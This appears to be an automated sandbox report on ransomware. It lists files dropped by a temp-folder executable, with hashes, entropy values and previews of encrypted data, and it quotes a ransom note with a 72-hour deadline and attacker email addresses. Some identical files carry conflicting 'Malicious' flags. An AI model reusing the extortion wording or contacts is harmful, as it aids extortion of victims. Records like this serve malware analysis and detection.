                                                                                                    Preview:.'2.....Fc.^.|....D.1..L.%.5t.....{...7+..;~N..b6R'I..?!..PI.a..4b.K..5./^I...r.~g...m..2.e.+....".&....'.,..Rk.W..>U..e. .......JG}YM3S...N......=.mb.....N..]3...k..;v...u.....i....).7!:|..i...q.....N...'1H..>.I.ZL...p~+...AH&j............:....r.....dZY..W(.....Xk.o.3..4..a`%/)..&\.n........S..F__.o.\.._UT.._....rE&.E.......7."........6n..I..F`l..g..,.b.....T..z!e...Cx...-..}..3..&......?U*xx.6.u..I9....t.06r.u.b.WC.z...~...j......*...'.J....._vf.R..(.u..a>.Y....L.....>O.(.ZYy....N...8M...Z.."(.h.I.....u........d.....-...o....i.....`{..{.ZF...=..<./......$z......?>.k...E...t..IB.....{......[...H.N.C%y...d.V....Z..."..d!)(e}1gx^1..>.......{...br.hc..5x...t'^".8v.u(...aG....(T..4....\4....~....<..r.v......0U.|+....k....z.'.5..1Y.......{.B0...s.V...."...../<.....T......p.H..F-.....T....W.J.4.F.z.}...r.$..H....,..pIw.i.st....F9.6..j..G.......#.*...iwU;-?c....;h.-.y.F..6....j..TgM.%..Dkm.....$....\kda.......>.t......e+9.r.F..C..Y.gXCf..`...g.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.845322623922669
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:s8pPf2MiNgdbT4h2kbgMHz/QSdW+rJDJoHhQmSMtwx1VBptjRRH:dh+MgGbT4mMHU+rJyQ32kVFRRH
                                                                                                    MD5:EA6ED21189AE7449824DB20FFFB08ED3
                                                                                                    SHA1:C3B2CC152283AD55DFCF6321C277AB6413DAEB7E
                                                                                                    SHA-256:03482ADC62600F55927602570F46F67BA73EC0EEE5321E687D6E8A82B1CB0DD9
                                                                                                    SHA-512:95FE6CB488E0D97A1B2E4C75ABADA80749FBC06F23039BC333C2DDE0C6F3BAF2B6F6B1955348F0571175C18C17FBD6D40008FCDC2CBB6E3B92F81E32A68690BF
                                                                                                    Malicious:false
                                                                                                    Preview:.J....p......U..gYC..*. .X..V.I..K..*.#.(.K....#._...m.nX..Z..].....{..a.......U...5Q{.d..Q.....4....1.{.O..7...X......<..ga.4..G....FMP..D.;.e...c.=w....e..[S...\H3...p=...!..S..<#.v.....h.OM.>d<.\.mI....E.J8.(.R5P#.....I.!..G5..b...E.4.........q....R.!..>[{..@.?..{.s..\.W.Gw.......7..n..6t.K.5.)..i........0.E..{LG.5....F.....v&..T.*:...-..^.3...Ul.0...3._..Z7...n.cPs.0G.r.....IfR..)....f.m.H...g..x.o...Mf....;e{5-2..(.0....6..........GMJ../g6+.F...{".{.......^.M:p.?u.R.7...~.0.1.<.2%'..5K...(C4.zr..3`.B@G.a.....D.8...s....!....V.3..ns....u..&X.+..4#/!....?..e..j.k3..f^ ...|..>...F..4..r!..0Y.ng.8.d.&..^...1|...../.....o.|t~...RHa2..d*".......Y....G..d.>l.......U.\..,...U..+iK~...6.s.H.].y..y.,...E.,tk......k|.:.w!....Kc.'e.K.........=...v..^.........s[...\.W.}%...c...In....... ...p..a.../..6.u...[....G...o\D...q..ML.......r.?.F..?..#[5R7..h...6&..{.y.'..Q*...a..^.....+}7..<...@..j...RG..Y.Vu6F..@..Z.hL....cg_K.r.&..\.X..q!
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.845322623922669
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:s8pPf2MiNgdbT4h2kbgMHz/QSdW+rJDJoHhQmSMtwx1VBptjRRH:dh+MgGbT4mMHU+rJyQ32kVFRRH
                                                                                                    MD5:EA6ED21189AE7449824DB20FFFB08ED3
                                                                                                    SHA1:C3B2CC152283AD55DFCF6321C277AB6413DAEB7E
                                                                                                    SHA-256:03482ADC62600F55927602570F46F67BA73EC0EEE5321E687D6E8A82B1CB0DD9
                                                                                                    SHA-512:95FE6CB488E0D97A1B2E4C75ABADA80749FBC06F23039BC333C2DDE0C6F3BAF2B6F6B1955348F0571175C18C17FBD6D40008FCDC2CBB6E3B92F81E32A68690BF
                                                                                                    Malicious:false
                                                                                                    Preview:.J....p......U..gYC..*. .X..V.I..K..*.#.(.K....#._...m.nX..Z..].....{..a.......U...5Q{.d..Q.....4....1.{.O..7...X......<..ga.4..G....FMP..D.;.e...c.=w....e..[S...\H3...p=...!..S..<#.v.....h.OM.>d<.\.mI....E.J8.(.R5P#.....I.!..G5..b...E.4.........q....R.!..>[{..@.?..{.s..\.W.Gw.......7..n..6t.K.5.)..i........0.E..{LG.5....F.....v&..T.*:...-..^.3...Ul.0...3._..Z7...n.cPs.0G.r.....IfR..)....f.m.H...g..x.o...Mf....;e{5-2..(.0....6..........GMJ../g6+.F...{".{.......^.M:p.?u.R.7...~.0.1.<.2%'..5K...(C4.zr..3`.B@G.a.....D.8...s....!....V.3..ns....u..&X.+..4#/!....?..e..j.k3..f^ ...|..>...F..4..r!..0Y.ng.8.d.&..^...1|...../.....o.|t~...RHa2..d*".......Y....G..d.>l.......U.\..,...U..+iK~...6.s.H.].y..y.,...E.,tk......k|.:.w!....Kc.'e.K.........=...v..^.........s[...\.W.}%...c...In....... ...p..a.../..6.u...[....G...o\D...q..ML.......r.?.F..?..#[5R7..h...6&..{.y.'..Q*...a..^.....+}7..<...@..j...RG..Y.Vu6F..@..Z.hL....cg_K.r.&..\.X..q!
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.842102634494323
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:XYMcxlpXudETGvh1/BVOWCUAX55VR/n28RDhbBBHwvapNqbsV6yQ7:/cxlplyvh5BCtlR/nRRDhdSvDyE
                                                                                                    MD5:F7EE5465663A527B4B561108B0339891
                                                                                                    SHA1:CEA0E9B4EE10B78F001512E9A20248B435E99722
                                                                                                    SHA-256:92BE05445C5BAEBF87B78AF4FE2FD85EF372281DB923DD793D15C6C47E3D180B
                                                                                                    SHA-512:DE13A6BB2FF577BAAC0F5B71B362B450891EB4C5F60F20C46223EE867460374DF598984450AF25FF138C87F0532764BCDABEA351DD427024296040E14E797DB7
                                                                                                    Malicious:false
                                                                                                    Preview:d$..-. .$N/..HRY.\.N..c...l).@#?zo,..|*J..Z.....p..?s.{...|..N..;...\..rYA.U.@:v.Q..'..r..M.>.Y.HQ.f~.S..:r.iY....$i...j.....9..b.w.A.`....|.AJ..>W."%....U..,q.A1.......N..2..8.O>C"..s:....3.".s}....n~.D.kI;.1...u............n...E....0w..@a...e...........8q(....3..a1Y...Yk..d..(.\.7K....K.Lbq<..).r..R...dKR)...th..e..J...b..E..((.Yo....T..b.S.ct.$.. )9..#...T.........e.E6V..m..+d..s9...t....CEE^w...3.C..].M!..r.*..9.}.F.s...P....tnoQz...f0....F....6......."'.....P.{x../...n_.J?.]........>fm#Y...#...rU.p... .f"v....O.h....W+k.:........}..{Lp..$..c&...C....l)...+......._....).F.;..c0.v{..t>f..h...1,.G7..% ...lA.....4.==..|..d!.......Zx....X......[.0'.Nx.b.~1!..>..a........h..}ZY2o.S 9..T*.m......d(....&.%H.-x.u$.f.]Y.VnW.Lb.N.....G.X...m).....'.(..&.d..%....&.&2..-...qD.}LN..Fwl...V.-.+Ux.bK..m]@a...V.....=7..,... ..a......._Pe....P.VH..Ax.......}Z.1..[ ............/]?..]Q.."...4.>.R..4W"E..;.....M...'`...s...S.<....7x...F.D....$b..%[gnh.|
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.842102634494323
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:XYMcxlpXudETGvh1/BVOWCUAX55VR/n28RDhbBBHwvapNqbsV6yQ7:/cxlplyvh5BCtlR/nRRDhdSvDyE
                                                                                                    MD5:F7EE5465663A527B4B561108B0339891
                                                                                                    SHA1:CEA0E9B4EE10B78F001512E9A20248B435E99722
                                                                                                    SHA-256:92BE05445C5BAEBF87B78AF4FE2FD85EF372281DB923DD793D15C6C47E3D180B
                                                                                                    SHA-512:DE13A6BB2FF577BAAC0F5B71B362B450891EB4C5F60F20C46223EE867460374DF598984450AF25FF138C87F0532764BCDABEA351DD427024296040E14E797DB7
                                                                                                    Malicious:false
                                                                                                    Preview:d$..-. .$N/..HRY.\.N..c...l).@#?zo,..|*J..Z.....p..?s.{...|..N..;...\..rYA.U.@:v.Q..'..r..M.>.Y.HQ.f~.S..:r.iY....$i...j.....9..b.w.A.`....|.AJ..>W."%....U..,q.A1.......N..2..8.O>C"..s:....3.".s}....n~.D.kI;.1...u............n...E....0w..@a...e...........8q(....3..a1Y...Yk..d..(.\.7K....K.Lbq<..).r..R...dKR)...th..e..J...b..E..((.Yo....T..b.S.ct.$.. )9..#...T.........e.E6V..m..+d..s9...t....CEE^w...3.C..].M!..r.*..9.}.F.s...P....tnoQz...f0....F....6......."'.....P.{x../...n_.J?.]........>fm#Y...#...rU.p... .f"v....O.h....W+k.:........}..{Lp..$..c&...C....l)...+......._....).F.;..c0.v{..t>f..h...1,.G7..% ...lA.....4.==..|..d!.......Zx....X......[.0'.Nx.b.~1!..>..a........h..}ZY2o.S 9..T*.m......d(....&.%H.-x.u$.f.]Y.VnW.Lb.N.....G.X...m).....'.(..&.d..%....&.&2..-...qD.}LN..Fwl...V.-.+Ux.bK..m]@a...V.....=7..,... ..a......._Pe....P.VH..Ax.......}Z.1..[ ............/]?..]Q.."...4.>.R..4W"E..;.....M...'`...s...S.<....7x...F.D....$b..%[gnh.|
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8668737022020006
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:z4aXBvA8jvRVvr2TnlBGAi5s6VKznQU8jhteKqwwhJYVB:jXBo8TRR6DTetKzQU2RwzWB
                                                                                                    MD5:9436301122A784205B2668BBB1927C69
                                                                                                    SHA1:4FB0824CF1F57AAF2D217308573F0B8859841D32
                                                                                                    SHA-256:F8C7D48D39A6275A1391E7949B3867B46CAAB218FD28AA50D7B0A42F6EF80563
                                                                                                    SHA-512:008688617EDB8C9DA898644851A87E08C33897E8DA1A0F27114948D6B9C7FDC9052AA4D9B97C704036C4AD10A38B7E4DC518F6D089FA11518AC6C416F0900362
                                                                                                    Malicious:true
                                                                                                    Preview:g@..Z.x...~Q.SH.S..s)..0.n.?.}.....[......Y.9--.U......./...6C.B?..4..'..q..d.O....YT.Y.e.`Y..}................ .,......[...RB..<*U]i....K.C@.,.J.N.V....JV..._....6Fd...z7w....~...)2m!..d.=........&>.7..J.....3....../.......Hi`.,.fC...5..\.A...W.zD..$u..ko.....k....[#....%....4.$...ge.l.}..r.;N=.o...R.".wA,.......3.....v5...v...X.m..p....N.H......h.vf.~...C..........L....l8s|.M....\...w{[B...ts..p.....%>..u.|..H.G0.#Y.@....Un..N...7....Ut6AS....c..1..E..?.....cG...D..G*....V....+ A%.../..,.P.d..hE..@e.N.....z.@'Y9.LS..v$K ...j....ACL?..bO.6i..,@.xM...B.....n..e..c.P.1.0.lnp..cg....P..\....)...B=.x2....}..K.:.An...P'n.e#..6&...`.....D@..K.......o.[..D..d6).T.%..C...D.G.g*.........}.9.&...j..T..^.-..:#.g...z...6:....<X.....Z...>..#.*1..A....A.j.F....g..F+=...o...N.......3.jw*....K...N'...3.....`....0...L}...(.e.r7...P.HIh.%...<L.3.X....Ho.e,..=*.0~.....;_.....I...:.F.o."^.Q/...J.....E.......Ig...T.W........5 .=Q..G.....dG....Y..^.a.t
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8668737022020006
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:z4aXBvA8jvRVvr2TnlBGAi5s6VKznQU8jhteKqwwhJYVB:jXBo8TRR6DTetKzQU2RwzWB
                                                                                                    MD5:9436301122A784205B2668BBB1927C69
                                                                                                    SHA1:4FB0824CF1F57AAF2D217308573F0B8859841D32
                                                                                                    SHA-256:F8C7D48D39A6275A1391E7949B3867B46CAAB218FD28AA50D7B0A42F6EF80563
                                                                                                    SHA-512:008688617EDB8C9DA898644851A87E08C33897E8DA1A0F27114948D6B9C7FDC9052AA4D9B97C704036C4AD10A38B7E4DC518F6D089FA11518AC6C416F0900362
                                                                                                    Malicious:false
                                                                                                    Preview:g@..Z.x...~Q.SH.S..s)..0.n.?.}.....[......Y.9--.U......./...6C.B?..4..'..q..d.O....YT.Y.e.`Y..}................ .,......[...RB..<*U]i....K.C@.,.J.N.V....JV..._....6Fd...z7w....~...)2m!..d.=........&>.7..J.....3....../.......Hi`.,.fC...5..\.A...W.zD..$u..ko.....k....[#....%....4.$...ge.l.}..r.;N=.o...R.".wA,.......3.....v5...v...X.m..p....N.H......h.vf.~...C..........L....l8s|.M....\...w{[B...ts..p.....%>..u.|..H.G0.#Y.@....Un..N...7....Ut6AS....c..1..E..?.....cG...D..G*....V....+ A%.../..,.P.d..hE..@e.N.....z.@'Y9.LS..v$K ...j....ACL?..bO.6i..,@.xM...B.....n..e..c.P.1.0.lnp..cg....P..\....)...B=.x2....}..K.:.An...P'n.e#..6&...`.....D@..K.......o.[..D..d6).T.%..C...D.G.g*.........}.9.&...j..T..^.-..:#.g...z...6:....<X.....Z...>..#.*1..A....A.j.F....g..F+=...o...N.......3.jw*....K...N'...3.....`....0...L}...(.e.r7...P.HIh.%...<L.3.X....Ho.e,..=*.0~.....;_.....I...:.F.o."^.Q/...J.....E.......Ig...T.W........5 .=Q..G.....dG....Y..^.a.t
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8543473915211734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:VO2ddSTyCqP3X/eJpmQ7IEoBPiqQ4RBE06CdiBjd+mbulFweXq+:NdSGCqPHxQtgRQ4gCdiZbIh
                                                                                                    MD5:EFE12314B0E2E2ACB6BE957E56AC09EE
                                                                                                    SHA1:4232B61FF20873C9EF9DFA65FEA7688CA2F9E7E4
                                                                                                    SHA-256:5B4E5D77377681126471D29DA953BB813ED593C66C3457D3F3630E795C5BA48F
                                                                                                    SHA-512:562E364329B59E62828CCBE1497510064FCC23687AC26B2B35E7869DB5CFA1FE438A84F8D3EF47D2C5BAC7CB92BBABAEDA591FAC7102A1F1325426F82BD03338
                                                                                                    Malicious:false
                                                                                                    Preview:..........5ab..L..>.}"a..y.q.d2..]...g&..2.W6c....'.g.Y.AB......y.W$/.......d;.R.I.....R..M._. .....-..9Q..F....)O....8........@4......$f.d.F.C[.U..{.F..........V~Z.......C.mr.7g.x.Y......;...Q.l._.z....W...J!.......)..3...6.B.1.58.v! $b...r..T`g..+.@....+&....4.mgmH..0..&3.k7.?...^:Uy....JO.j(...Wj.M..a.`..r.X.M..|?F@.H.*uf`........e. ^...iS..E.UO{....s-....0/.A+.:......K..6}...J..!.G.+58..?J]..r......[./z.L.....E|.x..yK.E.<{.MWQ.....M.|<&f<......>.8E0....x....L..DK.......W.~.]>z..c....9QP.Z....v!..Uy..%.Z..~+S.&O.k.d.UZ.3U...0VBk4........9Q(xP.L..x...N..{.."..J.R.Z1...T....".}!c.p{..i.} _J.......4z.M.....@.|....{.Y.)..5./@\m.~\..#tI..Un.".....1Q...5.._.IV.c3..9...`...$.1........$....v.pK.t.{....vq.[8..~ad.LP.....&.^.[..=ZE*...CT..#eHp.......%vu.'.m_=....!.To8....sk}.&T.\].v.[.]....@.I..l_....J..p...n...&3.H..\.$..W..>.......rrF..... ..L.3......6.i...}.>.....c..........Ij..{`..Zf*.G.i.RFm...MG........;d.d..YY.....>..5^...x......Jg.l..0..'.9..)
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.8543473915211734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:VO2ddSTyCqP3X/eJpmQ7IEoBPiqQ4RBE06CdiBjd+mbulFweXq+:NdSGCqPHxQtgRQ4gCdiZbIh
                                                                                                    MD5:EFE12314B0E2E2ACB6BE957E56AC09EE
                                                                                                    SHA1:4232B61FF20873C9EF9DFA65FEA7688CA2F9E7E4
                                                                                                    SHA-256:5B4E5D77377681126471D29DA953BB813ED593C66C3457D3F3630E795C5BA48F
                                                                                                    SHA-512:562E364329B59E62828CCBE1497510064FCC23687AC26B2B35E7869DB5CFA1FE438A84F8D3EF47D2C5BAC7CB92BBABAEDA591FAC7102A1F1325426F82BD03338
                                                                                                    Malicious:false
                                                                                                    Preview:..........5ab..L..>.}"a..y.q.d2..]...g&..2.W6c....'.g.Y.AB......y.W$/.......d;.R.I.....R..M._. .....-..9Q..F....)O....8........@4......$f.d.F.C[.U..{.F..........V~Z.......C.mr.7g.x.Y......;...Q.l._.z....W...J!.......)..3...6.B.1.58.v! $b...r..T`g..+.@....+&....4.mgmH..0..&3.k7.?...^:Uy....JO.j(...Wj.M..a.`..r.X.M..|?F@.H.*uf`........e. ^...iS..E.UO{....s-....0/.A+.:......K..6}...J..!.G.+58..?J]..r......[./z.L.....E|.x..yK.E.<{.MWQ.....M.|<&f<......>.8E0....x....L..DK.......W.~.]>z..c....9QP.Z....v!..Uy..%.Z..~+S.&O.k.d.UZ.3U...0VBk4........9Q(xP.L..x...N..{.."..J.R.Z1...T....".}!c.p{..i.} _J.......4z.M.....@.|....{.Y.)..5./@\m.~\..#tI..Un.".....1Q...5.._.IV.c3..9...`...$.1........$....v.pK.t.{....vq.[8..~ad.LP.....&.^.[..=ZE*...CT..#eHp.......%vu.'.m_=....!.To8....sk}.&T.\].v.[.]....@.I..l_....J..p...n...&3.H..\.$..W..>.......rrF..... ..L.3......6.i...}.>.....c..........Ij..{`..Zf*.G.i.RFm...MG........;d.d..YY.....>..5^...x......Jg.l..0..'.9..)
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.84477566710042
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:emtBhxylWEj7cT0w2fL1UyLbVEsPvSzZZCtj2L+MCi+2kNazGzPPFVRj:emtHxuvET0Rj1UyLbVVKzjSj2qMs5NNh
                                                                                                    MD5:F226DF2994D159F01A22726BD23514D0
                                                                                                    SHA1:60EBA79C7E76B33204BEC7EFD6D42EFFBE8ACB68
                                                                                                    SHA-256:8A356698A08E3E59F78EBE7195ABBA2DBA5A2CDCDF22FEE07AE109F938AFD569
                                                                                                    SHA-512:074F26F41EB208AFE0A232D093F1FAF7EBA1AB2D9CAD94B2E8C5DE48BE264DE3809F587E4A0981E1ADED823A6118C32112590C68BE17A5A536657CA1EB9E9F44
                                                                                                    Malicious:true
                                                                                                    Preview:.QI....|.y....@U.....7J...s=...p...$g...[/...D...1......'~."."..6..O...iZ$.....v[Y..@.........[.(i.E..T6...4.%.*1m.0-Qr....2=z?....u..Y.J.'..*..y.A.....u:...g.2|.(t.z+k+.#...F2f4.#..L.J....B..n.gC8d.Q@....-....O@L. .}.U...,o...P..*....V...x...>....?..i..b..Vc..f.R...[....9*O..5.&D(............t..t.,...W...k......i...../..\..M....yR@.C.V..L`....."$YUD.,Nu..J.5.v..[@!b.Zw....H.WN..C..H...lT...8.EvvV7G4.....+}0.!...:...[av./...;.....[..;.^*._-...2&(...5.CW.....{Q..l.._.-*.....v.A..."O.X..r,.m-.A'dGwO.>.>..]([`j27h........7!.\B-...f.60...s.E...T..6.n.g.V...@.F....K....O...2..:."L...~.J.C...;..Ox.M......c..=....~..>........o./oH....H.....5u..K4..#....Z.c.b.E..}...;:./..(... .....%..Xj..._....n.>V../..Y.....T.g.z'~.g........(...$B.A.......~.{hD.......tJ.D5...V.6J.V.V...|R..v...c:..$....=l..ZW....2.......S>.*....l3/. .....%_B\p.!...R...U/o...`3E...f......Y.....>8......>....K\.4sf.w...5....0.x..[<.......W}..r ..>g...T.....?...]).].S.+.9"2..Q._
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.84477566710042
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:emtBhxylWEj7cT0w2fL1UyLbVEsPvSzZZCtj2L+MCi+2kNazGzPPFVRj:emtHxuvET0Rj1UyLbVVKzjSj2qMs5NNh
                                                                                                    MD5:F226DF2994D159F01A22726BD23514D0
                                                                                                    SHA1:60EBA79C7E76B33204BEC7EFD6D42EFFBE8ACB68
                                                                                                    SHA-256:8A356698A08E3E59F78EBE7195ABBA2DBA5A2CDCDF22FEE07AE109F938AFD569
                                                                                                    SHA-512:074F26F41EB208AFE0A232D093F1FAF7EBA1AB2D9CAD94B2E8C5DE48BE264DE3809F587E4A0981E1ADED823A6118C32112590C68BE17A5A536657CA1EB9E9F44
                                                                                                    Malicious:false
                                                                                                    Preview:.QI....|.y....@U.....7J...s=...p...$g...[/...D...1......'~."."..6..O...iZ$.....v[Y..@.........[.(i.E..T6...4.%.*1m.0-Qr....2=z?....u..Y.J.'..*..y.A.....u:...g.2|.(t.z+k+.#...F2f4.#..L.J....B..n.gC8d.Q@....-....O@L. .}.U...,o...P..*....V...x...>....?..i..b..Vc..f.R...[....9*O..5.&D(............t..t.,...W...k......i...../..\..M....yR@.C.V..L`....."$YUD.,Nu..J.5.v..[@!b.Zw....H.WN..C..H...lT...8.EvvV7G4.....+}0.!...:...[av./...;.....[..;.^*._-...2&(...5.CW.....{Q..l.._.-*.....v.A..."O.X..r,.m-.A'dGwO.>.>..]([`j27h........7!.\B-...f.60...s.E...T..6.n.g.V...@.F....K....O...2..:."L...~.J.C...;..Ox.M......c..=....~..>........o./oH....H.....5u..K4..#....Z.c.b.E..}...;:./..(... .....%..Xj..._....n.>V../..Y.....T.g.z'~.g........(...$B.A.......~.{hD.......tJ.D5...V.6J.V.V...|R..v...c:..$....=l..ZW....2.......S>.*....l3/. .....%_B\p.!...R...U/o...`3E...f......Y.....>8......>....K\.4sf.w...5....0.x..[<.......W}..r ..>g...T.....?...]).].S.+.9"2..Q._
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.845849255817136
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:8gKSA6Yjlq8F9YsTdB5GpeBEbiP9LjQj5pfwaMjAJCv/zZDvJfhPb:BY9pfJdBJkiP9f6dwEJU/zhJfhD
                                                                                                    MD5:C04C1D81DB37AAC4C5CA2619CB680135
                                                                                                    SHA1:EA5EDA06513513562E39771A0DBE971E15A30D1C
                                                                                                    SHA-256:DD2B0DA94E3821FCA2A099220C0949174C0683BE4DBE46714F2C0D2372AD2866
                                                                                                    SHA-512:2D44DBBF5796F7499C91ACFF074C4A996FE02D368C44D06D68D70B71466758C4CBE5932A517CE26712CADC6F89FD343C8A4A50FCBB8F6FD6F65B440292DD19B6
                                                                                                    Malicious:false
                                                                                                    Preview:.....(IS.L..@q.}.Ux\.u.l.'....$....n...]31..gi{...O..2....Y..i...K.;.0..-U-.....|.l..r........T..7.1K..r...%..H(p.\..kL^M..v.i.....yOW.=.g4N...-G.D.f....n...}.y.B.g....1..*].Z...........+9..p...y..xLx.y..c.m?.C..N9.A.[..b...)`s.B.G_r$.1CU..EK...a..^y..W..L..Ul.!3...3..].Ng..:..Y..e....w....-....S....0vWp.!l?Q..@..U..m>...L.U.N8...R.z..5|N..:(.....4V..C#I..._#.....4\.zmUKz..U......!.g.a.....[f..M=).4..th'.re.Y...y.M.j...W1.....!'@......$.!#vJ...t.6..b.c...|..E.0.r....9E..$...).....,..8.r@./...<w..P.....I...6.rv.k ..b..uL!...U.....A.E.,a..r".3...LU.z.V.C.t.:?w.x}...YC..0...*..*......M.|=.d...gH...r....&.Mal....@.P....`B....{h.,./....Gk*./.t..........f....z.^L..Q... cP.Qode.y.......-.B.....i.......R..S..V...K.y..{[....J....v..C.....,..s8..=.T.=... .z.S[....x....)#......'x....yl:y.*........F4..K'../...."..*..`..09..6$..o.}...H......qF.a.....tFru.....-F~...tL.6..gC...............v.r...thV.s..mET..we..P.Q.3...y.n........9d.............i..e
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):7.845849255817136
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:8gKSA6Yjlq8F9YsTdB5GpeBEbiP9LjQj5pfwaMjAJCv/zZDvJfhPb:BY9pfJdBJkiP9f6dwEJU/zhJfhD
                                                                                                    MD5:C04C1D81DB37AAC4C5CA2619CB680135
                                                                                                    SHA1:EA5EDA06513513562E39771A0DBE971E15A30D1C
                                                                                                    SHA-256:DD2B0DA94E3821FCA2A099220C0949174C0683BE4DBE46714F2C0D2372AD2866
                                                                                                    SHA-512:2D44DBBF5796F7499C91ACFF074C4A996FE02D368C44D06D68D70B71466758C4CBE5932A517CE26712CADC6F89FD343C8A4A50FCBB8F6FD6F65B440292DD19B6
                                                                                                    Malicious:false
